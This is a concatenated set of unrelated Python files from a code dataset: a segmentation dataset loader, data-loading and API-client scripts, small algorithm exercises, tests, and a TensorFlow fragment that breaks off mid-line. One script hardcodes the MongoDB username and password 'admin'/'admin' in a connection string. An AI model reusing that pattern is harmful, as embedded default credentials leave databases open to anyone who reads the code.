SegmentationDataset(torch.utils.data.Dataset):\n def __init__(self, cfg: dict, split=\"train\", transform=None, labels=True):\n self.cfg = cfg\n self.split = split\n self.labels = labels\n self.crop_size = cfg.CROP_SIZE\n self.base_size = cfg.BASE_SIZE\n \n search_image_files = os.path.join(\n cfg.DATA_DIR,\n cfg.IMAGE_DIR, \n split, '*', \n cfg.INPUT_PATTERN)\n\n if labels:\n search_annot_files = os.path.join(\n cfg.DATA_DIR,\n cfg.LABEL_DIR, \n split, '*', \n cfg.ANNOT_PATTERN)\n \n \n # root directory\n root = pathlib.Path.cwd() \n\n input_path = str(root / search_image_files)\n if labels:\n target_path = str(root / search_annot_files)\n \n self.inputs = [pathlib.PurePath(file) for file in sorted(glob.glob(search_image_files))]\n if labels:\n self.targets = [pathlib.PurePath(file) for file in sorted(glob.glob(search_annot_files))]\n \n # print(\"{} images\".format(len(self.inputs)))\n # print(\"{} masks\".format(len(self.targets)))\n \n self.transform = transform\n self.inputs_dtype = torch.float32\n if labels:\n self.targets_dtype = torch.int64\n \n self.class_weights = torch.FloatTensor([0.8373, 0.918, 0.866, 1.0345, \n 1.0166, 0.9969, 0.9754, 1.0489,\n 0.8786, 1.0023, 0.9539, 0.9843, \n 1.1116, 0.9037, 1.0865, 1.0955, \n 1.0865, 1.1529, 1.0507]) # .cuda()\n \n\n def __len__(self):\n return len(self.inputs)\n\n def __getitem__(self, index: int):\n \n # Select the sample\n input_ID = self.inputs[index]\n if self.labels:\n target_ID = self.targets[index]\n name = os.path.splitext(os.path.basename(input_ID))[0]\n\n # Load input and target\n if self.labels:\n x, y = 
imread(str(input_ID)), imread(str(target_ID))\n else:\n x = imread(str(input_ID))\n size = x.shape\n \n # Preprocessing\n if (self.transform is not None) and self.labels:\n x, y = self.transform(x, y)\n elif self.transform is not None:\n x = self.transform(x)\n\n # Typecasting\n if self.labels:\n x, y = torch.from_numpy(x).type(self.inputs_dtype), torch.from_numpy(y).type(self.targets_dtype)\n y = y.squeeze()\n return x, y, np.array(size), name\n else:\n x = torch.from_numpy(x).type(self.inputs_dtype)\n return x, np.array(size), name\n \n \n def inference(self, model, image):\n # assume input image is channels first\n batch, _, ori_height, ori_width = image.size()\n assert batch == 1, \"only supporting batchsize 1.\"\n # convert to channels last for resizing\n image = image.numpy()[0].transpose((1,2,0)).copy()\n h, w = self.crop_size\n new_img = cv2.resize(image, (w, h), interpolation=cv2.INTER_LINEAR)\n # convert to channels first for inference\n new_img = new_img.transpose((2, 0, 1))\n new_img = np.expand_dims(new_img, axis=0)\n pred = model(torch.from_numpy(new_img))\n # resize to base size\n pred = F.interpolate(input=pred, size=(ori_height, ori_width), mode='bilinear', align_corners=False)\n # pred = pred.numpy()\n return pred.exp()\n \n \n def label_to_rgb(self, seg):\n h = seg.shape[0]\n w = seg.shape[1]\n seg_rgb = np.zeros((h, w, 3), dtype=np.uint8)\n for key, val in trainid2label.items():\n indices = seg == key\n seg_rgb[indices.squeeze()] = val.color \n return seg_rgb\n \n \n def save_pred(self, image, pred, sv_path, name):\n pred = np.asarray(np.argmax(pred.cpu(), axis=1), dtype=np.uint8)\n pred = self.label_to_rgb(pred[0])\n image = image.cpu()\n image = image[0].permute(1,2,0).numpy()\n image = re_normalize(image)\n\n blend = cv2.addWeighted(image, 0.8, pred, 0.8, 0)\n pil_blend = Image.fromarray(blend).convert(\"RGB\")\n pil_blend.save(os.path.join(sv_path, name[0]+'.png'))\n\n \n \n\ndef label_mapping(seg: np.ndarray, label_map: dict):\n seg = seg.astype(np.int32)\n temp = np.copy(seg)\n for key, val in label_map.items():\n seg[temp == key] = val.trainId\n return seg\n\n\ndef cityscapes_label_to_rgb(mask):\n h = mask.shape[0]\n w = mask.shape[1]\n mask_rgb = np.zeros((h, w, 3), dtype=np.uint8)\n for key, val in trainid2label.items():\n indices = mask == key\n mask_rgb[indices.squeeze()] = val.color \n return mask_rgb\n\n\ndef display(display_list):\n plt.figure(figsize=(15, 5), dpi=150)\n title = ['Input Image', 'True Mask', 'Predicted Mask']\n for i in range(len(display_list)):\n plt.subplot(1, len(display_list), i+1)\n plt.title(title[i])\n plt.imshow(display_list[i])\n plt.axis('off')\n plt.tight_layout()\n plt.show()\n\n \ndef display_blend(display_list):\n plt.figure(figsize=(10, 10), dpi=150)\n for i in range(len(display_list)):\n blend = cv2.addWeighted(display_list[i][0], 0.8, display_list[i][1], 0.5, 0)\n plt.subplot(1, len(display_list), i+1)\n plt.imshow(blend)\n plt.axis('off')\n plt.tight_layout()\n plt.show()","sub_path":"utils/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":6264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"193619500","text":"import pandas as lectorCsv\nimport pymongo\nfrom pymongo import MongoClient\n\ndef captura():\n \n temperatura = lectorCsv.read_csv(\"./Datos/temperature.csv\")\n humedad = lectorCsv.read_csv(\"./Datos/humidity.csv\")\n\n temperatura = temperatura[['datetime','San Francisco']]\n temperatura = temperatura.rename(columns={'San 
Francisco': 'Temperatura'})\n\n humedad = humedad[['datetime','San Francisco']]\n humedad = humedad.rename(columns={'San Francisco': 'Humedad'})\n\n datos = lectorCsv.merge(temperatura,humedad, on= 'datetime')\n # Limpiar datos https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.dropna.html\n datos = datos.dropna()\n # Coge los 100 ultimos, empezando por abajo https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.tail.html\n datos = datos.tail(100)\n\n # How to connect with MongoClient https://mongodb.github.io/node-mongodb-native/driver-articles/mongoclient.html\n # https://stackoverflow.com/questions/40346767/pymongo-auth-failed-in-python-script\n # https://pymongo.readthedocs.io/en/stable/examples/authentication.html\n client = MongoClient('mongodb+srv://%s:%s@p2gbv.lpeag.mongodb.net/SanFrancisco?retryWrites=true&w=majority' % ('admin', 'admin'))\n # El nombre de la base de datos\n baseDeDatos = client[\"SanFrancisco\"]\n # La columna que voy a usar\n columna = baseDeDatos[\"Pronostico\"]\n # Poner un indice, pero sin hacer ninguna copia (inplace=True) https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.reset_index.html\n datos.reset_index(inplace=True)\n # https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.to_dict.html\n data_dict = datos.to_dict(\"records\")\n # Bulk insert https://docs.mongodb.com/manual/reference/method/db.collection.insertMany/\n # https://pymongo.readthedocs.io/en/stable/tutorial.html TIENE QUE SER UN CLIENTE NO UN DATABASE OBJECT\n columna.insert_many(data_dict)\n\nif __name__ == '__main__':\n captura()","sub_path":"capturaDatos.py","file_name":"capturaDatos.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"590907487","text":"# hackerrank twoSum problem with a twist - returns all pairs\n# algorithm runs O(nlogn)\n\n\ndef binarysearch(array, target): # binary search to find compliment in O(logn) time\n low = 0\n high = len(array) - 1\n index = -1\n while low <= high:\n mid = low + (high - low) // 2\n if array[mid] < target:\n low = mid + 1\n elif array[mid] > target:\n high = mid - 1\n elif array[mid] == target:\n index = mid\n break\n return index\n\n\ndef merge(des, left, right):\n d_index = 0 # destination index\n r_index = 0 # right index\n l_index = 0 # left index\n while l_index < len(left) and r_index < len(right):\n if left[l_index] <= right[r_index]:\n des[d_index] = left[l_index]\n d_index += 1\n l_index += 1\n else:\n des[d_index] = right[r_index]\n r_index += 1\n d_index += 1\n while l_index < len(left):\n des[d_index] = left[l_index]\n d_index += 1\n l_index += 1\n while r_index < len(right):\n des[d_index] = right[r_index]\n d_index += 1\n r_index += 1\n return des\n\n\n# recursive merge sort\n# implemented one for fun\ndef mergesort(arr):\n if len(arr) < 2:\n return arr\n\n mid = len(arr) // 2\n left = arr[0:mid]\n right = arr[mid: len(arr)]\n\n mergesort(left)\n mergesort(right)\n\n return merge(arr, left, right)\n\n\ndef compliments(array, target):\n if len(array) < 2: # array must have at least two values\n return []\n pair = [] # return all unique pairs\n mergesort(array) # sort array for effective binary search\n for value in array:\n temp = [] # track pairs\n compliment = target - value # find value compliment\n index = binarysearch(array, compliment) # if compliment exist\n if index != -1:\n temp.append(value)\n temp.append(array[index])\n mergesort(temp) # we don't want duplicate order like [-1, 10] and 
[10, -1]\n if temp not in pair: # only add if pair doesn't exit\n pair.append(temp)\n return pair\n\n\n# test case\na = [0, 3, 9, - 1, 8, 1, 10, 4, 5, 6, 3, 2, 7]\nprint(compliments(a, 9))\n","sub_path":"TwoSum.py","file_name":"TwoSum.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"335712741","text":"\"\"\"\nContains possible interaction dealing with Galaxy dependency resolvers.\n\"\"\"\nfrom bioblend.galaxy.client import Client\n\n\nclass ToolDependenciesClient(Client):\n\n def __init__(self, galaxy_instance):\n self.module = 'dependency_resolvers'\n super().__init__(galaxy_instance)\n\n def summarize_toolbox(self, index=None, tool_ids=[], resolver_type=None, include_containers=None, container_type=None, index_by=None):\n \"\"\"\n GET /api/dependency_resolvers/toolbox\n\n Summarize requirements across toolbox (for Tool Management grid). This is an experiemental\n API particularly tied to the GUI - expect breaking changes until this notice is removed.\n\n :type index: int\n :param index: index of the dependency resolver\n :type tool_ids: list\n :param tool_ids: tool_ids to return when index_by=tool\n :type resolver_type: str\n :param resolver_type: restrict to specified resolver type\n :type include_containers: bool\n :param include_containers: include container resolvers in resolution\n :type container_type: str\n :param container_type: restrict to specified container type\n :type index_by: str\n :param index_by: By default consider only context of requirements, group tools by requirements.\n Set this to 'tools' to summarize across all tools though. Tools may provide additional\n context for container resolution for instance.\n\n :rtype: list\n :returns: dictified descriptions of the dependencies, with attribute\n `dependency_type: None` if no match was found.\n For example::\n \n [{'requirements': [{'name': 'galaxy_sequence_utils',\n 'specs': [],\n 'type': 'package',\n 'version': '1.1.4'},\n {'name': 'bx-python',\n 'specs': [],\n 'type': 'package',\n 'version': '0.8.6'}],\n 'status': [{'cacheable': False,\n 'dependency_type': None,\n 'exact': True,\n 'model_class': 'NullDependency',\n 'name': 'galaxy_sequence_utils',\n 'version': '1.1.4'},\n {'cacheable': False,\n 'dependency_type': None,\n 'exact': True,\n 'model_class': 'NullDependency',\n 'name': 'bx-python',\n 'version': '0.8.6'}],\n 'tool_ids': ['vcf_to_maf_customtrack1']}] \n \"\"\"\n\n params = {}\n if index:\n params['index'] = str(index)\n if tool_ids:\n params['tool_ids'] = ','.join(tool_ids)\n if resolver_type:\n params['resolver_type'] = resolver_type\n if include_containers is not None:\n params['include_containers'] = str(include_containers)\n if container_type:\n params['container_type'] = container_type\n if index_by:\n params['index_by'] = index_by\n\n url = self._make_url() + '/toolbox'\n return self._get(url=url, params=params)\n\n","sub_path":"bioblend/galaxy/tool_dependencies/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"32296680","text":"import csv\n\ndef load(filename, columns=[], rows=[], headers=True, grouped=True, delimiter=',', quotechar='\\\"'):\n rows = {r for r in rows}\n with open(filename, newline='') as f:\n reader = csv.reader(f, delimiter=delimiter, quotechar=quotechar)\n # get headers\n if headers:\n col_names = next(reader)\n if len(columns):\n col_names = 
[col_names[col] for col in columns]\n # get data\n if len(columns) and len(rows): data = [[row[col] for col in columns] for row in reader if row in rows]\n elif len(columns): data = [[row[col] for col in columns] for row in reader]\n elif len(rows): data = [row for row in reader if row in rows]\n else: data = [row for row in reader]\n return col_names, data\n\ndef save(filename, headers=[], data=[], delimiter=',', quotechar='\\\"', quoting=csv.QUOTE_MINIMAL):\n with open(filename, 'w', newline='') as f:\n writer = csv.writer(f, delimiter=delimiter, quotechar=quotechar, quoting=quoting)\n if len(headers):\n writer.writerow(headers)\n [writer.writerow(row) for row in data]\n\ndef append(filename, data=[], delimiter=',', quotechar='\\\"', quoting=csv.QUOTE_MINIMAL):\n with open(filename, 'a', newline='') as f:\n writer = csv.writer(f, delimiter=delimiter, quotechar=quotechar, quoting=quoting)\n [writer.writerow(row) for row in data]","sub_path":"SimpPyKit/simple_csv.py","file_name":"simple_csv.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"20470078","text":"from urllib.request import Request, urlopen\nimport json\nfrom api import settings\nfrom api.images import get_images_serie, get_images_seasons, get_images_season, get_images_episode, get_images_movie\n\n\ndef Movie(id, images = False, extended = True):\n\turl = settings.URL + '/movies/' + id + ('?extended=full' if extended else None)\n\trequest = Request(url, headers=settings.HEADER)\n\tresponse = urlopen(request).read().decode('utf-8')\n\tmovie = json.loads(response)\n\t\n\tif images:\n\t\turl = settings.URL + '/movies/' + id + '?extended=images'\n\t\trequest = Request(url, headers=settings.HEADER)\n\t\tresponse = urlopen(request).read().decode('utf-8')\n\t\tmovie = get_images_movie(movie, json.loads(response))\n\n\treturn movie\n\t\t\n\ndef Show(id, images = False, seasons = False, extended = True):\n\turl = settings.URL + '/shows/' + id + ('?extended=full' if extended else None)\n\trequest = Request(url, headers=settings.HEADER)\n\tresponse = urlopen(request).read().decode('utf-8')\n\tshow = json.loads(response)\n\n\tif images:\n\t\turl = settings.URL + '/shows/' + id + '?extended=images'\n\t\trequest = Request(url, headers=settings.HEADER)\n\t\tresponse = urlopen(request).read().decode('utf-8')\n\t\tshow = get_images_serie(show, json.loads(response))\n\n\tif seasons:\n\t\tshow['seasons'] = Seasons(id, images, extended)\n\n\treturn show\n\n\ndef Seasons(show_id, images = True, extended = True):\n\turl = settings.URL + '/shows/' + show_id + '/seasons' + ('?extended=full' if extended else None)\n\trequest = Request(url, headers=settings.HEADER)\n\tresponse = urlopen(request).read().decode('utf-8')\n\tseasons = json.loads(response)\n\t\n\tif images:\n\t\turl = settings.URL + '/shows/' + show_id + '/seasons?extended=images'\n\t\trequest = Request(url, headers=settings.HEADER)\n\t\tresponse = urlopen(request).read().decode('utf-8')\n\t\tseasons = get_images_seasons(seasons, json.loads(response))\n\n\treturn seasons\n\n\ndef Season(show_id, season_number, images = False, episodes = False):\n\tseasons = Seasons(show_id, images)\n\tseason = seasons[season_number]\n\n\tif images:\n\t\turl = settings.URL + '/shows/' + show_id + '/seasons?extended=images'\n\t\trequest = Request(url, headers=settings.HEADER)\n\t\tresponse = urlopen(request).read().decode('utf-8')\n\t\tseason = get_images_season(season, json.loads(response))\n\n\tif 
episodes:\n\t\tseason['episodes'] = []\n\t\tfor i in range(1, season['episode_count'] + 1):\n\t\t\tseason['episodes'].append(Episode(show_id, season_number, i, images))\n\n\treturn season\n\n\ndef Episode(show_id, season_number, episode_number, images = False, extended = True):\n\turl = settings.URL + '/shows/' + show_id + '/seasons/' + str(season_number)+ '/episodes/' + str(episode_number) + ('?extended=full' if extended else None)\n\trequest = Request(url, headers=settings.HEADER)\n\tresponse = urlopen(request).read().decode('utf-8')\n\tepisode = json.loads(response)\n\n\tif images:\n\t\turl = settings.URL + '/shows/' + show_id + '/seasons/' + str(season_number)+ '/' + str(episode_number) + '?extended=images'\n\t\trequest = Request(url, headers=settings.HEADER)\n\t\tresponse = urlopen(request).read().decode('utf-8')\n\t\tepisode = get_images_episode(episode, json.loads(response))\n\n\treturn episode\n","sub_path":"api/model_api.py","file_name":"model_api.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"66658381","text":"#url:http://api.89ip.cn/tqdl.html?api=1&num=9999&port=&address=&isp=\nimport requests\nimport re\nimport string\nimport time\n#content > section > div.container > table > tbody > tr:nth-child(5) > td:nth-child(1)\ndef ip_port(url):\n s = requests.session()\n s.keep_alive = False #防止http连接过多\n response = requests.get(url)\n text = response.text\n data = re.findall('[.\\n]*(.*?)
<br>',text) # [.\\n]* matches newline characters\n    data = data + re.findall('<br>(.*?)<br>
',text)\n return data\n\nif __name__ == '__main__':\n url = 'http://api.89ip.cn/tqdl.html?api=1&num=9999&port=&address=&isp='\n f = open('D:/test/Code/exercise/reptile/data/reptile3.txt','w')\n data = ip_port(url)\n for line in data:\n print(line)\n f.write(line+'\\n')\n f.close()\n","sub_path":"exercise/reptile/reptile3.py","file_name":"reptile3.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"497724092","text":"\"\"\"\n\"\"\"\n\nimport sys\nimport os\n\nimport itertools\nimport random\nimport pickle\n\nimport numpy\nfrom . import LatinSquare\n\nclass COD:\n \"\"\"Crossover Design for sensory evaluations.\n \n Attributes:\n t (int): Total number of products (treatments) to be tested.\n p (int): Number of periods any subject is exposed to.\n r (int): Number of times every treatment is tested.\n s (int): Number of subjects (blocks).\n lambda_ (int): Total number of pairwise comparisons made.\n \n laplacian (numpy.matrix): Laplacian Matrix for the design.\n Equal to (r - lambda)*I + (lambda)*J.\n \n \"\"\"\n def __init__(self, treatments, periods, replicates, pickle_name=None):\n \"\"\"Crossover Design.\n \n Args:\n treatments (int): Total number of products (treatments) to be\n tested.\n periods (int): Number of periods any subject is exposed to.\n replicates (int): Number of periods any subject is exposed to.\n pickle_name (str): String containing the path to a pickle file\n created with the save_result() method.\n \n \"\"\"\n \n # Validate parameters as those of a BIBD.\n # https://en.wikipedia.org/wiki/Block_design\n if not (replicates * treatments) % periods == 0:\n raise ValueError('Parameters must be consistent with \\\ntreatments * replicates = (some_integer) * periods')\n\n elif not (replicates * (periods - 1)) % (treatments - 1) == 0:\n raise ValueError('Parameters must be consistent with \\\nreplicates * (periods - 1) = (some_integer) * (treatments - 1)')\n \n self.t = treatments\n self.p = periods\n self.r = replicates\n self.s = (self.t * self.r) // self.p\n self.num_squares = self.s // self.t\n self.lambda_ = (self.r * (self.p - 1)) // (self.t - 1)\n self.square = LatinSquare(self.t)\n \n self.laplacian = numpy.matrix((self.r - self.lambda_) *\\\n numpy.identity(self.t)\\\n + (self.lambda_) * numpy.ones(self.t))\n \n \n if pickle_name:\n self.pickle_name = pickle_name\n with open(self.pickle_name, 'rb') as pickle_file:\n items = pickle.load(pickle_file)\n if (self.t, self.p, self.r) != items[0]:\n raise ValueError('This file was created for a \\\ndifferent set of parameters: t=%d,p=%d,r=%d' % items[0])\n else:\n perms = items[1]\n self._find_design(perms)\n else:\n self._find_design()\n \n def _make_design(self, saved_perms=None):\n '''\n '''\n cod = []\n values = range(self.t)\n \n if saved_perms is None:\n perms = itertools.permutations(values, self.p)\n self.permutations = random.sample(list(perms), self.num_squares)\n else:\n self.permutations = saved_perms\n \n for perm in self.permutations:\n for row in self.square.square:\n cod.append([row[indx] for indx in perm])\n \n return cod\n \n def _get_incidence_matrix(self, cod):\n '''\n '''\n nrows = len(cod)\n ncols = len(cod[0])\n matrix = [[1 if j in cod[i] else 0 \\\n for j in range(self.t)] for i in range(nrows)]\n \n return numpy.matrix(matrix).T\n \n def _is_balanced(self, cod):\n '''\n '''\n m = self._get_incidence_matrix(cod)\n return (self.laplacian == (m)*(m.T)).all()\n \n def _find_design(self, saved_perms=None):\n 
'''\n '''\n \n balanced = False\n \n while not balanced:\n cod = self._make_design(saved_perms)\n m = self._get_incidence_matrix(cod)\n balanced = self._is_balanced(cod)\n \n self.cod = cod\n self.incidence_matrix = m\n \n def copy_to_spreadsheet(self, codes=None):\n \"\"\"Copy design as tab-spaced table for pasting into a spreadsheet.\n \n Args:\n codes (iterable of str): Any iterable containing strings as\n the codes for the design.\n \n Returns None. \n \n \"\"\"\n import pyperclip\n \n if codes is None:\n codes = range(self.t)\n elif len(codes) < self.t:\n raise IndexError('The number of codes must be at \\\nleast as big as the number of treatments in the design.')\n \n to_copy = ''\n for row in self.cod:\n to_copy += '\\t'.join([str(codes[i]) for i in row]) + '\\n'\n \n \n pyperclip.copy(to_copy)\n \n return None\n \n def __str__(self):\n s = ''\n for row in self.cod:\n s += '\\t'.join(row) + '\\n'\n \n return s\n \n def save_result(self, filename):\n \"\"\"Saves the current found permutation to a pickle file.\n \n Args:\n filename (str): Filename or path.\n \n Returns None.\n \n \"\"\"\n \n with open(filename, 'wb') as pickle_file:\n pickle.dump(((self.t, self.p, self.r), self.permutations),\n pickle_file)\n \n return None\n \n\n \ndef main():\n # design = COD(11, 6, 150)\n design = COD(9, 6, 96)\n # design = COD(5, 4, 16)\n # design = COD(5, 3, 12)\n print(design.r)\n print(design.lambda_)\n print(design.s)\n print(design.num_squares)\n print(design.laplacian)\n print(design.cod)\n print(design.incidence_matrix)\n print((design.incidence_matrix) * (design.incidence_matrix.T))\n print(design.incidence_matrix.shape)\n pass\n \nif __name__ == '__main__':\n main()","sub_path":"pycrossdes/COD.py","file_name":"COD.py","file_ext":"py","file_size_in_byte":5821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"475781618","text":"import requests\n\n\ndef buscar_avartar(usuario):\n \"\"\"\n Buscar o avatar de um usuário no GitHub\n :param usuario: str com o nome do usuário do github\n :return:str com o link do avatar\n \"\"\"\n url = f'https://api.github.com/users/{usuario}'\n resp = requests.get(url)\n return resp.json()['avatar_url']\n\n\nif __name__ == '__main__':\n print(buscar_avartar('rondinelisaad'))\n","sub_path":"libpythonpro/github_apy.py","file_name":"github_apy.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"102485829","text":"from datetime import date, timedelta\n\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.template import Context\nfrom django.template.loader import render_to_string\n\nfrom hotsite.core.utils import send_email\nfrom hotsite.catalog.models import Software\n\n\nclass Command(BaseCommand):\n title = 'Process Emails'\n help = 'Sends emails'\n\n def add_arguments(self, parser):\n pass\n\n def handle(self, *args, **options):\n instances = []\n provider_pos = 0\n template_name = 'panel/mail.html'\n\n today_str = date.today().strftime('%d/%m/%Y')\n yesterday = date.today() - timedelta(days=1)\n\n softwares_updated = Software.get_updated(date=yesterday)\n\n for instance in softwares_updated:\n if len(instances) == 0:\n instances.append({\n 'provider': instance.provider.name,\n 'softwares': []\n })\n\n last_provider_id = instance.provider.id\n\n if last_provider_id == instance.provider.id:\n instances[provider_pos]['softwares'].append({\n 'name': instance.name,\n 'version_stable': 
instance.version_stable\n })\n\n else:\n instances.append({\n 'provider': instance.provider.name,\n 'softwares': [{\n 'name': instance.name,\n 'version_stable': instance.version_stable\n }, ]\n })\n\n provider_pos += 1\n last_provider_id = instance.provider.id\n\n context = {\n 'instances': instances,\n 'date': today_str\n }\n\n send_email(\n context,\n ['grp-ctis@ifs.edu.br', 'raphael.fontes@ifs.edu.br'],\n f'Resumo de Alerta de Segurança - {today_str}',\n template_name\n )\n\n self.stdout.write(self.style.SUCCESS('Successfully emails sent!'))\n","sub_path":"hotsite/hotsite/core/management/commands/process_email.py","file_name":"process_email.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"74166709","text":"import unittest\nimport nctoolkit as nc\nnc.options(lazy= True)\nimport pandas as pd\nimport xarray as xr\nimport os\n\n\nclass TestNCO(unittest.TestCase):\n def test_empty(self):\n n = len(nc.session_files())\n self.assertEqual(n, 0)\n\n def test_mean(self):\n data = nc.open_data(nc.create_ensemble(\"data/ensemble\"))\n data.ensemble_mean(vars = \"sst\")\n data.spatial_mean()\n x = data.to_dataframe().sst.values[0].astype(\"float\")\n\n data = nc.open_data(nc.create_ensemble(\"data/ensemble\"))\n data.nco_command(\"ncea -y mean\", ensemble = True)\n data.spatial_mean()\n y = data.to_dataframe().sst.values[0].astype(\"float\")\n\n self.assertEqual(x, y)\n\n def test_mean2(self):\n data = nc.open_data(nc.create_ensemble(\"data/ensemble\"))\n data.mean()\n data.merge_time()\n data.mean()\n data.spatial_mean()\n x = data.to_dataframe().sst.values[0].astype(\"float\")\n\n data = nc.open_data(nc.create_ensemble(\"data/ensemble\"))\n data.nco_command(\"ncra -y mean\", ensemble = False)\n\n data.merge_time()\n data.mean()\n data.spatial_mean()\n\n y = data.to_dataframe().sst.values[0].astype(\"float\")\n\n self.assertEqual(x, y)\n\n def test_command_error(self):\n\n data = nc.open_data(nc.create_ensemble(\"data/ensemble\"))\n\n with self.assertRaises(TypeError) as context:\n data.nco_command(1)\n\n with self.assertRaises(ValueError) as context:\n data.nco_command(\"test\")\n with self.assertRaises(ValueError) as context:\n data.nco_command()\n\n\n\nif __name__ == '__main__':\n unittest.main()\n\n","sub_path":"tests/test_nco_command_lazy.py","file_name":"test_nco_command_lazy.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"279541443","text":"s = \"A man, a plan, a canal: Panama\"\n\n\ndef palindrome(s: str) -> bool:\n s = s.lower()\n s_stripped = ''.join(list(filter(lambda x: x.isalnum() == True, s)))\n low = 0\n high = len(s_stripped) - 1\n while low <= high:\n if s_stripped[low] == s_stripped[high]:\n low += 1\n high -= 1\n continue\n else:\n return False\n\n return True\n\n\nprint(palindrome(s))\n\nprint(s)\n","sub_path":"String/Panlidrome.py","file_name":"Panlidrome.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"312578788","text":"import requests\nimport json\nfrom .. import app\nfrom .. import db\nfrom .. import hooks\nfrom .. import models\nfrom .. import queue\nfrom .. 
import views\nfrom flask import request, jsonify\n\n\ndef register():\n hooks.register('post-saved', reverse_geocode)\n hooks.register('venue-saved', reverse_geocode_venue)\n\n\ndef reverse_geocode(post, args):\n queue.enqueue(do_reverse_geocode_post, post.id)\n\n\ndef reverse_geocode_venue(venue, args):\n queue.enqueue(do_reverse_geocode_venue, venue.id)\n\n\ndef do_reverse_geocode_post(postid):\n post = models.Post.load_by_id(postid)\n if post.location and 'latitude' in post.location \\\n and 'longitude' in post.location:\n adr = do_reverse_geocode(post.location['latitude'],\n post.location['longitude'])\n # copy the dict so that the ORM recognizes\n # that it changed\n post.location = dict(post.location)\n post.location.update(adr)\n db.session.commit()\n\n\ndef do_reverse_geocode_venue(venueid):\n venue = models.Venue.query.get(venueid)\n if venue.location and 'latitude' in venue.location \\\n and 'longitude' in venue.location:\n adr = do_reverse_geocode(venue.location['latitude'],\n venue.location['longitude'])\n # copy the dict so the ORM actually recognizes\n # that it changed\n venue.location = dict(venue.location)\n venue.location.update(adr)\n venue.update_slug(views.geo_name(venue.location))\n db.session.commit()\n\n\ndef do_reverse_geocode(lat, lng):\n def region(adr):\n if adr.get('country_code') == 'us':\n return adr.get('state') or adr.get('county')\n else:\n return adr.get('county') or adr.get('state')\n\n app.logger.debug('reverse geocoding with nominatum')\n r = requests.get('http://nominatim.openstreetmap.org/reverse',\n params={\n 'lat': lat,\n 'lon': lng,\n 'format': 'json'\n })\n r.raise_for_status()\n\n data = json.loads(r.text)\n app.logger.debug('received response %s',\n json.dumps(data, indent=True))\n\n adr = data.get('address', {})\n\n # hat-tip https://gist.github.com/barnabywalters/8318401\n return {\n 'street_address': adr.get('road'),\n 'extended_address': adr.get('suburb'),\n 'locality': (adr.get('hamlet')\n or adr.get('village')\n or adr.get('town')\n or adr.get('city')\n or adr.get('locality')\n or adr.get('suburb')\n or adr.get('county')),\n 'region': region(adr),\n 'country_name': adr.get('country'),\n 'postal_code': adr.get('postcode'),\n 'country_code': adr.get('country_code'),\n }\n\n\n@app.route('/services/geocode')\ndef reverse_geocode_service():\n lat = request.args.get('latitude')\n lng = request.args.get('longitude')\n return jsonify(do_reverse_geocode(lat, lng))\n","sub_path":"redwind/plugins/locations.py","file_name":"locations.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"34477434","text":"import os\nimport glob\nfrom pexpect import *\n\nc = spawn('bash')\nc.expect('\\$')\ncwd = os.getcwd()\nfor dir in glob.glob(cwd + os.sep + '*'):\n if os.path.isfile(dir):\n (path, name) = os.path.split(dir)\n print (dir, path, name)\n c.sendline('ln -s %s ../testdir/%s' % (dir, name))\n c.expect('\\$')\n","sub_path":"fusion_sensor_unit_test/TestLibs/ln.py","file_name":"ln.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"644809147","text":"import Produce_Model_Data\nimport tensorflow as tf\nimport numpy as np\n\nfrom matplotlib import pyplot as plt\n\nX_train, X_test, X_dev, y_train, y_test, y_dev, full_dataset, submission_features = Produce_Model_Data.produce_train_test_dev()\n\n\ndef y_logger(y):\n out = np.log(y)\n out[(out == np.inf) | (out == -np.inf)] 
